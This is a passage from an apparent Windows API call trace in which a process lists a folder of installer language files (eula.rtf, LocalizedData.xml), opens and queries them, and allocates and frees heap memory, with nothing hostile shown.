[0061.629] SetLastError (dwErrCode=0x5) [0061.629] GetLastError () returned 0x5 [0061.629] SetLastError (dwErrCode=0x5) [0061.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78690 | out: hHeap=0x20000) returned 1 [0061.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0061.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.630] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="2070", cAlternateFileName="")) returned 1 [0061.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0061.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.630] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78190 [0061.630] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.630] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x16c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0061.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0061.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0061.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x466d8 [0061.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0061.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0061.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x719c8 [0061.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0061.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0061.631] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.631] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.631] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.631] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0061.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.631] AreFileApisANSI () returned 1 [0061.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\2052\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\2052\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0061.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.631] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.631] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0061.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0061.631] AreFileApisANSI () returned 1 [0061.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0061.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 36 [0061.631] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.631] GetFileType (hFile=0x41c) returned 0x1 [0061.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0061.632] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.632] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.632] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.632] CloseHandle (hObject=0x41c) returned 1 [0061.636] AreFileApisANSI () returned 1 [0061.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68b80 [0061.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x68b80, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 36 [0061.636] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.636] GetFileType (hFile=0x41c) returned 0x1 [0061.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0061.636] CloseHandle (hObject=0x41c) returned 1 [0061.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0061.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0061.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0061.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0061.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0061.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0061.637] AreFileApisANSI () returned 1 [0061.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0061.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 36 [0061.637] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x16c3)) returned 1 [0061.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0061.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0061.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.637] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.637] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.637] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed0c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0061.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0061.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0061.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0061.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0061.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0061.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0061.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0061.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.638] AreFileApisANSI () returned 1 [0061.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0061.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0061.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0061.638] AreFileApisANSI () returned 1 [0061.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0061.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 45 [0061.639] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.639] GetFileType (hFile=0x41c) returned 0x1 [0061.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0061.639] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.639] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.639] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.639] CloseHandle (hObject=0x41c) returned 1 [0061.640] AreFileApisANSI () returned 1 [0061.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0061.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 45 [0061.640] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.640] GetFileType (hFile=0x41c) returned 0x1 [0061.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.640] CloseHandle (hObject=0x41c) returned 1 [0061.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0061.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0061.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 